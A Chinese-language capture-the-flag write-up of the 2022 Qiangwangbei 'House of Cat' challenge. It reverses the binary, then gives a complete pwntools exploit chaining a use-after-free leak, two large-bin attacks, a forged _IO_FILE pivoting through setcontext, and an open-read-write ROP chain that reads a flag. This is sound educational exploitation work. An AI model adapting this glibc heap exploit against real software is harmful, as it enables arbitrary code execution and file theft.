[强网杯 2022]House of Cat

前言:作为一道典型的 House Of Cat,很多博主都发放了题目链接,NSSCTF 平台上也有该题目,可以自行复现

1777437955928-f2fdf1d5-8e66-4425-90cd-c28cba9dac13.png

程序分析:

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void __fastcall __noreturn main(_BYTE *p_s_1, char **p_s, char **a3)
{
    _BYTE s[72]; // [rsp+0h] [rbp-50h] BYREF
    unsigned __int64 v4; // [rsp+48h] [rbp-8h]

    v4 = __readfsqword(0x28u);
    seccomp();
    while ( 1 )
    {
        sub_155E(p_s_1, p_s);
        write_0("mew mew mew~~~~~~\n");
        memset(s, 0, 0x3Cu);
        p_s = (char **)s;                    // p_s指向s的内存
        read(0, s, 0x3Bu);                   // 读取s
        p_s_1 = s;                           // 把s内容赋值给p_s_1
        sub_19D6(s);
    }
}

分析发现题目开启沙箱,简单修改函数名

sub_19D6

1
2
3
4
5
6
7
8
9
10
11
unsigned __int64 __fastcall sub_19D6(char *p_s)
{
    _BYTE s[56]; // [rsp+10h] [rbp-40h] BYREF
    unsigned __int64 v3; // [rsp+48h] [rbp-8h]

    v3 = __readfsqword(0x28u);
    memset(s, 0, 0x30u);
    if ( (unsigned int)sub_1A50(p_s, (__int64)s) )
        sub_1DF3((__int64)s);
    return v3 - __readfsqword(0x28u);
}

sub_1A50

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
__int64 __fastcall sub_1A50(char *p_s, __int64 a2)
{
    char *s; // [rsp+18h] [rbp-28h]
    char *v4; // [rsp+20h] [rbp-20h]
    char *haystack; // [rsp+20h] [rbp-20h]
    char *v6; // [rsp+20h] [rbp-20h]
    const char *s2; // [rsp+28h] [rbp-18h]
    char *s_1; // [rsp+30h] [rbp-10h]
    const char *s1; // [rsp+38h] [rbp-8h]

    v4 = strstr(p_s, "QWB");         // 我们在main函数当中输入了s,检查输入内容是否存在QWB
    if ( !v4 )
        return 0;
    *v4 = 0;                             
    v4[1] = 0;
    v4[2] = 32;                      // NULL + NULL + 空格 = \x00\x00 ,进行字符截断
    haystack = v4 + 3;               // haystack = QWB之后的字符串
    s2 = strtok(p_s, " ");           // s2指向p_s中第一个空格前面的字符串
    if ( !strcmp("LOGIN", s2) )
    {
        *(_BYTE *)(a2 + 8) = 1;      // 如果是 "LOGIN",则给结构体偏移 8 的位置赋值:*(a2 + 8) = 1
    }
    else if ( *(_BYTE *)(a2 + 8) || strcmp("DOG", s2) )  // 如果是 "DOG" -> 赋值 2
    {
        if ( *(_BYTE *)(a2 + 8) || strcmp("CAT", s2) )   // 如果是 "CAT" -> 赋值 3
        {
            if ( *(_BYTE *)(a2 + 8) || strcmp("MONKEY", s2) )
            {
                if ( *(_BYTE *)(a2 + 8) || strcmp("FISH", s2) )
                {
                    if ( *(_BYTE *)(a2 + 8) || strcmp("PIG", s2) )
                    {
                        if ( *(_BYTE *)(a2 + 8) || strcmp("WOLF", s2) )
                        {
                            if ( *(_BYTE *)(a2 + 8) || strcmp("DUCK", s2) )
                            {
                                if ( *(_BYTE *)(a2 + 8) || strcmp("GOLF", s2) )
                                {
                                    if ( *(_BYTE *)(a2 + 8) || strcmp("TIGER", s2) )
                                        return 0;
                                    *(_BYTE *)(a2 + 8) = 10;
                                }
                                else
                                {
                                    *(_BYTE *)(a2 + 8) = 9;
                                }
                            }
                            else
                            {
                                *(_BYTE *)(a2 + 8) = 8;
                            }
                        }
                        else
                        {
                            *(_BYTE *)(a2 + 8) = 7;
                        }
                    }
                    else
                    {
                        *(_BYTE *)(a2 + 8) = 6;
                    }
                }
                else
                {
                    *(_BYTE *)(a2 + 8) = 5;
                }
            }
            else
            {
                *(_BYTE *)(a2 + 8) = 4;
            }
        }
        else
        {
            *(_BYTE *)(a2 + 8) = 3;
        }
    }
    else
    {
        *(_BYTE *)(a2 + 8) = 2;
    }
    s_1 = strtok(0, " ");           // 传 0 / NULL 表示继续从上一个位置往后分割
    if ( s_1 != strchr(s_1, 124) )  // 获取第二个单词,强制要求它必须是 |(ASCII 124)
        return 0;
    *(_QWORD *)a2 = s_1;
    s1 = strtok(0, " ");
    if ( strcmp(s1, "r00t") )       // 获取第三个单词,强制要求它必须是字符串 "r00t"
        return 0;
    s = haystack + 5;               // s = 从空格 + QWXF 之后的内容
    v6 = strstr(haystack, "QWXF");
    if ( !v6 )
        return 0;
    *v6 = 0;
    v6[1] = 0;
    v6[2] = 0;
    v6[3] = 32;
    *(_QWORD *)(a2 + 16) = s;       // 该指针指向a2 + 16
    return 1;
}

sub_1DF3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
ssize_t __fastcall sub_1DF3(__int64 p_s)
{
    ssize_t n3; // rax
    unsigned int n4; // eax
    char *n3_1; // [rsp+18h] [rbp-8h]

    if ( *(_BYTE *)(p_s + 8) == 1 && !strcmp(*(const char **)(p_s + 16), "admin") )
        dword_4040[0] = 1;
    n3 = *(unsigned __int8 *)(p_s + 8);
    if ( (_BYTE)n3 == 3 )
    {
        n3 = (ssize_t)strtok(*(char **)(p_s + 16), "$");
        n3_1 = (char *)n3;
        if ( n3 )
        {
            n3 = ::n3;
            if ( *n3_1 == ::n3 )
            {
                n3 = dword_4040[0];
                if ( dword_4040[0] )
                {
                    menu();
                    n4 = atoi_0();
                    if ( n4 == 4 )
                    {
                        return edit();
                    }
                    else
                    {
                        if ( n4 <= 4 )
                        {
                            switch ( n4 )
                            {
                                case 3u:
                                    return show();
                                case 1u:
                                    return add();
                                case 2u:
                                    return delete();
                            }
                        }
                        return write_0("error!\n");
                    }
                }
            }
        }
    }
    return n3;
}

首先我们要先进行登录,然后堆块管理:具体命令根据上面分析后如下:

LOGIN | r00t QWB QWXFadmin

CAT | r00t QWB QWXF$\xff

  • 1. (LOGIN):验证你的身份是 admin,赋予你高级权限(全局变量标志位置 1)。只需解锁一次。
  • 2. (CAT):每次你想要执行堆操作(增删改查)时,都必须携带特定格式的令牌(以 $ 分隔并附带 \xff 字节)

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
ssize_t add()
{
    unsigned __int64 idx; // [rsp+0h] [rbp-10h]
    size_t size; // [rsp+8h] [rbp-8h]

    write_0("plz input your cat idx:\n");
    idx = (unsigned int)atoi_0();
    if ( idx > 0xF || *((_QWORD *)&unk_4060 + idx) )
        return write_0("invalid!\n");
    write_0("plz input your cat size:\n");
    size = (unsigned int)atoi_0();
    if ( size <= 0x417 || size > 0x46F )
        return write_0("invalid size!\n");
    *((_QWORD *)&unk_4060 + idx) = calloc(1u, size);
    if ( !*((_QWORD *)&unk_4060 + idx) )
        return write_0("error!\n");
    qword_40E0[idx] = size;
    write_0("plz input your content:\n");
    return read(0, *((void **)&unk_4060 + idx), qword_40E0[idx]);
}

delete

1
2
3
4
5
6
7
8
9
10
11
void delete()
{
    unsigned __int64 idx; // [rsp+8h] [rbp-8h]

    write_0("plz input your cat idx:\n");
    idx = (unsigned int)atoi_0();
    if ( idx <= 0xF && *((_QWORD *)&unk_4060 + idx) )
        free(*((void **)&unk_4060 + idx));
    else
        write_0("invalid!\n");
}

show

1
2
3
4
5
6
7
8
9
10
11
ssize_t show()
{
    unsigned __int64 idx; // [rsp+8h] [rbp-8h]

    write_0("plz input your cat idx:\n");
    idx = (unsigned int)atoi_0();
    if ( idx > 0xF || !*((_QWORD *)&unk_4060 + idx) )
        return write_0("invalid!\n");
    write_0("Context:\n");
    return write(1, *((const void **)&unk_4060 + idx), 0x30u);
}

edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ssize_t edit()
{
    unsigned __int64 idx; // [rsp+8h] [rbp-8h]

    if ( dword_4010 <= 0 )
        return write_0("nonono!!!!\n");
    --dword_4010;
    write_0("plz input your cat idx:\n");
    idx = (unsigned int)atoi_0();
    if ( idx > 0xF || !*((_QWORD *)&unk_4060 + idx) )
        return write_0("invalid!\n");
    write_0("plz input your content:\n");
    return read(0, *((void **)&unk_4060 + idx), 0x30u);
}

EXP 思路:

封装函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
io.sendafter("mew mew mew~~~~~~\n","LOGIN | r00t QWB QWXFadmin")


def add(index,size,msg='\x00'):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","1")
    io.sendlineafter("cat idx:\n",str(index))
    io.sendlineafter("cat size:\n",str(size))
    io.sendafter("your content:\n",msg)

def free(index):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","2")
    io.sendlineafter("cat idx:\n",str(index))

def show(index):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","3")
    io.sendlineafter("cat idx:\n",str(index))



def edit(index,msg):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","4")
    io.sendlineafter("cat idx:\n",str(index))
    io.sendafter("your content:\n",msg)

泄露 libc_base 和 heap_base

1
2
3
4
5
6
7
add(0,0x420) # chunk 0
add(1,0x430) # chunk 1 隔离块
add(2,0x418) # chunk 2

free(0)      # Unsorted Bin
add(3,0x430) # chunk 3
show(0)

1777465667901-85bb6dfc-ba0c-46ef-9498-445c7c0f88ef.png

  • 利用 show 分别泄露 fdbk 指向的 main_arena 和 fd_nextbk_next 指向的 largebin 堆地址
1
2
3
4
5
6
7
8
9
io.recvuntil("Context:\n")
libc_base = u64(io.recv(8)) - 0x21a0d0
log.success(f"libc_base is {hex(libc_base)}")
io.recv(8)
heap_base = u64(io.recv(6).ljust(8,b'\x00')) -0x290
log.success(f"heap_base is {hex(heap_base)}")

gdb.attach(io)
pause()

1777465933177-d0390415-d9b4-487e-8678-488a04fc3d07.png

gadgets

1
2
3
4
5
6
7
8
9
10
11
12
setcontext = libc_base + libc.sym["setcontext"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
pop_rax = libc_base + 0x0000000000045eb0#: pop rax; ret; 
pop_rdi = libc_base + 0x000000000002a3e5#: pop rdi; ret; 
pop_rsi = libc_base + 0x000000000002be51#: pop rsi; ret; 
pop_rdx_r12 = libc_base + 0x000000000011f497#: pop rdx; pop r12; ret; 
lv = libc_base + 0x00000000000562ec#: leave; ret; 
stderr = libc_base + libc.sym['stderr']
close = libc_base + libc.sym["close"]
syscall = libc_base + 0x0000000000091396#: syscall; ret; 
_IO_wfile_jumps = libc_base + 0x2160c0

ORW

1
2
3
4
5
6
7
flag_addr = heap_base + 0xb00 + 0x230

orw = flat(pop_rdi ,0 , close)
orw += flat(pop_rdi,flag_addr,pop_rsi,0,pop_rax,2,syscall)
orw += flat(pop_rdi,0,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,read)
orw += flat(pop_rdi,1,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,write)
orw += b'flag\x00\x00\x00\x00' + p64(0xdeadbeef)

ORW 已经见过很多次了,这里不再多做强调,简单分析一下偏移量的计算吧:

  • 我们这里把 chunk3 作为 ORW 的地址,对于 heap_base 的偏移是 0xb00,内容地址要 + 0x10 = 0xb10
  • ORW 链的长度是 0xD0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct _IO_FILE
{
    int _flags;                       // 0x00
    char *_IO_read_ptr;               // 0x08
    char *_IO_read_end;               // 0x10
    char *_IO_read_base;              // 0x18
    char *_IO_write_base;             // 0x20
    char *_IO_write_ptr;              // 0x28
    char *_IO_write_end;              // 0x30
    char *_IO_buf_base;               // 0x38
    char *_IO_buf_end;                // 0x40
    char *_IO_save_base;              // 0x48
    char *_IO_backup_base;            // 0x50
    char *_IO_save_end;               // 0x58
    struct _IO_marker *_markers;      // 0x60
    struct _IO_FILE *_chain;          // 0x68
    int _fileno;                      // 0x70
    int _flags2;                      // 0x74
    __off_t _old_offset;              // 0x78
    unsigned short _cur_column;       // 0x80
    signed char _vtable_offset;       // 0x82
    char _shortbuf[1];                // 0x83
    _IO_lock_t *_lock;                // 0x88
    __off64_t _offset;                // 0x90
    struct _IO_codecvt *_codecvt;     // 0x98
    struct _IO_wide_data *_wide_data; // 0xA0
    struct _IO_FILE *_freeres_list;   // 0xA8
    void *_freeres_buf;               // 0xB0
    size_t __pad5;                    // 0xB8
    int _mode;                        // 0xC0
    char _unused2[20];                // 0xC4
    const struct _IO_jump_t *_vtable; // 0xD8
};

伪造 IO_FILE House of Cat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
fake_io_addr = heap_base + 0xb00 # 计划将 fake IO 放在这里的堆上

fake_IO_FILE  = p64(0)*6
fake_IO_FILE += p64(1)+p64(0)
# 劫持 setcontext 的关键:控制 rdx
fake_IO_FILE += p64(fake_io_addr+0xb0)# _IO_backup_base = rdx -----> setcontext + 61 
fake_IO_FILE += p64(setcontext+0x3d)  # _IO_save_end = call addr rax+0x58 (调用 setcontext)
# ... 中间使用 \x00 填充对齐 IO_FILE 的各个字段 ...
fake_IO_FILE += p64(heap_base+0x200)  # _lock 必须指向一个可写的地址,避免程序崩溃
# ...
fake_IO_FILE += p64(libc_base+0x2160c0+0x10)  # 伪造 vtable 为 _IO_wfile_jumps+0x10
# ...
fake_IO_FILE += p64(fake_io_addr + 0x160) + p64(pop_rdi+1) # 设置栈迁移后的 rsp 指向 ORW 链
fake_IO_FILE += orw # 将 ORW 链拼在 fake IO 结构的尾部

第一次 largebin_attack

1
2
3
4
5
6
7
free(2)                   # Unsorted Bin

payload = p64(libc_base + 0x21a0d0)*2 + p64(heap_base + 0x290) + p64(stderr - 0x20) 
add(6,0x418,fake_IO_FILE) # 重新申请并把 fake_IO_FILE 写进 chunk 2 原来的位置
edit(0,payload)           # UAF修改已经在 Unsorted Bin 里的 chunk 0 的指针
free(6)
add(4,0x430)              # 把UnSortedbin放入Largebin
  • 我们用 UAF 把 chunk 0 的 bk_nextsize 修改为 stderr - 0x20
  • 当我们 add(4, 0x430) 时,由于没有匹配的块,malloc 会遍历 Unsorted Bin,把 chunk 0 从中取出来,插入到 Large Bin 中。
  • Largebin_attack: chunk->bk_nextsize->fd_nextsize = chunk = stderr
  • 导致系统的 stderr 指针现在指向了堆上的 chunk 0(以及我们紧挨着伪造的 fake_IO_FILE)。

第二次 Large Bin Attack:破坏 Top Chunk

1
2
3
4
5
6
7
8
9
10
11
add(5,0x440)                    # 申请进入后续的 Large Bin
add(7,0x430)
add(8,0x430) 
free(5)                         # 释放 chunk 5 进入 Unsorted Bin
add(9,0x450)                    # 触发整理,chunk 5 进入 Large Bin
top_chunk = heap_base + 0x28d0 

# payload 目标:top_chunk 的 size 字段
payload = p64(libc_base + 0x21a0e0)*2 + p64(heap_base + 0x17a0) + p64(top_chunk + 3 - 0x20)
edit(5,payload)                 # UAF:修改 Large Bin 里的 chunk 5
free(8)                         # 释放 8 进入 Unsorted Bin

重复上述 Large Bin Attack 的手法,但这次修改的指针目标是 top_chunk + 3 - 0x20

  • 当接下来再次触发 Large Bin 插入时,利用错位,会把小端序的 size 篡改为堆地址 >> 3 = 0x56 触发 sysmalloc

触发 malloc_assert

1
2
3
4
io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
io.sendlineafter('plz input your cat choice:\n',str(1)) # 选 1: add
io.sendlineafter('plz input your cat idx:',str(11))
io.sendlineafter('plz input your cat size:',str(0x450)) # 申请大内存触发崩溃
  • 程序尝试分配 0x450 大小的内存。
  • malloc会先把刚才释放的 chunk 8 排入 Large Bin触发第二次 LargeBin Attack,改写top_chunk_size
  • malloc 发现现有的 free 堆块都无法满足 0x450 的大小,只能求助于 top_chunk
  • malloc 检查 top_chunk 发现非法 size,于是抛出异常,调用 malloc_printerr
  • malloc_printerr 在输出错误信息时,会刷新和调用 stderr 流。
  • 由于 stderr 已经在第一次 Attack 中被我们劫持到了堆上的 fake_IO_FILE,程序跳转到堆上。
  • 经过 House of Cat ,setcontext 改变栈指针,最终执行 ROP 链打印 Flag

总 EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
from pwn import *

elf = ELF('./houseofcat')
io = process("./houseofcat")
libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc.so.6")
context(arch = elf.arch, log_level = 'debug', os = 'linux')
context.terminal=["tmux","splitw","-h"]

#gdb.attach(io)
io.sendafter("mew mew mew~~~~~~\n","LOGIN | r00t QWB QWXFadmin")


def add(index,size,msg='\x00'):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","1")
    io.sendlineafter("cat idx:\n",str(index))
    io.sendlineafter("cat size:\n",str(size))
    io.sendafter("your content:\n",msg)

def free(index):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","2")
    io.sendlineafter("cat idx:\n",str(index))

def show(index):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","3")
    io.sendlineafter("cat idx:\n",str(index))

def edit(index,msg):
    io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
    io.sendlineafter("choice:\n","4")
    io.sendlineafter("cat idx:\n",str(index))
    io.sendafter("your content:\n",msg)

add(0,0x420) #0
add(1,0x430) #1
add(2,0x418) #2

free(0)
add(3,0x430) #4
show(0)

# gdb.attach(io)
# pause()

io.recvuntil("Context:\n")
libc_base = u64(io.recv(8)) - 0x21a0d0
log.success(f"libc_base is {hex(libc_base)}")
io.recv(8)
heap_base = u64(io.recv(6).ljust(8,b'\x00')) -0x290
log.success(f"heap_base is {hex(heap_base)}")

# gdb.attach(io)
# pause()

setcontext = libc_base + libc.sym["setcontext"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
pop_rax = libc_base + 0x0000000000045eb0#: pop rax; ret; 
pop_rdi = libc_base + 0x000000000002a3e5#: pop rdi; ret; 
pop_rsi = libc_base + 0x000000000002be51#: pop rsi; ret; 
pop_rdx_r12 = libc_base + 0x000000000011f497#: pop rdx; pop r12; ret; 
lv = libc_base + 0x00000000000562ec#: leave; ret; 
stderr = libc_base + libc.sym['stderr']
close = libc_base + libc.sym["close"]
syscall = libc_base + 0x0000000000091396#: syscall; ret; 
_IO_wfile_jumps = libc_base + 0x2160c0


flag_addr = heap_base + 0xb00 + 0x230

# orw = flat(pop_rdi ,0 , close)
# orw += flat(pop_rdi,flag_addr,pop_rsi,0,pop_rax,2,syscall)
# orw += flat(pop_rdi,0,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,read)
# orw += flat(pop_rdi,1,pop_rsi,heap_base + 0x500,pop_rdx_r12,0x30,0,write)
# orw += b'flag\x00\x00\x00\x00' + p64(0xdeadbeef)

#close
rop=p64(pop_rdi)
rop+=p64(0)
rop+=p64(close)
#open
rop+=p64(pop_rdi)
rop+=p64(flag_addr)
rop+=p64(pop_rsi)
rop+=p64(0)
rop+=p64(pop_rax)
rop+=p64(2)
rop+=p64(syscall)

#read
rop+=p64(pop_rdi)
rop+=p64(0)
rop+=p64(pop_rsi)
rop+=p64(heap_base + 0x500)
rop+=p64(pop_rdx_r12)
rop+=p64(0x30)
rop+=p64(0)
rop+=p64(read)

#write
rop+=p64(pop_rdi)
rop+=p64(1)
rop+=p64(pop_rsi)
rop+=p64(heap_base+0x500)
rop+=p64(pop_rdx_r12)
rop+=p64(0x30)
rop+=p64(0)
rop+=p64(write)

rop += b'flag\x00\x00\x00\x00' + p64(0xdeadbeef)


fake_io_addr = heap_base + 0xb00

fake_IO_FILE  = p64(0)*6
fake_IO_FILE += p64(1)+p64(0)
fake_IO_FILE += p64(fake_io_addr+0xb0)#_IO_backup_base=rdx -----> setcontext + 61 
fake_IO_FILE += p64(setcontext+0x3d)#_IO_save_end=call addr rax+0x58
fake_IO_FILE  = fake_IO_FILE.ljust(0x58,b'\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE  = fake_IO_FILE.ljust(0x78,b'\x00')
fake_IO_FILE += p64(heap_base+0x200)  # _lock = writable address
fake_IO_FILE  = fake_IO_FILE.ljust(0x90,b'\x00')
fake_IO_FILE += p64(heap_base+0xb30) #rax1
fake_IO_FILE  = fake_IO_FILE.ljust(0xB0,b'\x00')
fake_IO_FILE += p64(0)
fake_IO_FILE  = fake_IO_FILE.ljust(0xC8,b'\x00')
fake_IO_FILE += p64(libc_base+0x2160c0+0x10)  # vtable=_IO_wfile_jumps+0x10
fake_IO_FILE += p64(0) *6
fake_IO_FILE += p64(fake_io_addr + 0x40) #rax2+0xe0
fake_IO_FILE += p64(0) * 7 + p64(fake_io_addr + 0x160) + p64(pop_rdi+1) #rdx + 0xa0 , 0xa8
fake_IO_FILE += rop

free(2)
payload = p64(libc_base+0x21a0d0)*2 + p64(heap_base+0x290) + p64(stderr - 0x20) 
add(6,0x418,fake_IO_FILE)
edit(0,payload)
free(6)
add(4,0x430)

#gdb.attach(io)
add(5,0x440) #large
add(7,0x430)
add(8,0x430) #unsort
free(5)
add(9,0x450)
top_chunk = heap_base + 0x28d0 
payload = p64(libc_base+0x21a0e0)*2 + p64(heap_base + 0x17a0) + p64(top_chunk+3 - 0x20)
edit(5,payload)
free(8)

#add(10,0x460)
#gdb.attach(io)

io.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff")
io.sendlineafter('plz input your cat choice:\n',str(1))
io.sendlineafter('plz input your cat idx:',str(11))

# gdb.attach(io,'b* (_IO_wfile_seekoff)')
# gdb.attach(io)
io.sendlineafter('plz input your cat size:',str(0x450))



io.interactive()

1777468593583-ff9b6f6e-db41-40e0-9835-b602771439a6.png

更新: 2026-04-30 14:11:00
原文: https://www.yuque.com/idcm/wnemg9/oofxp5teigufu212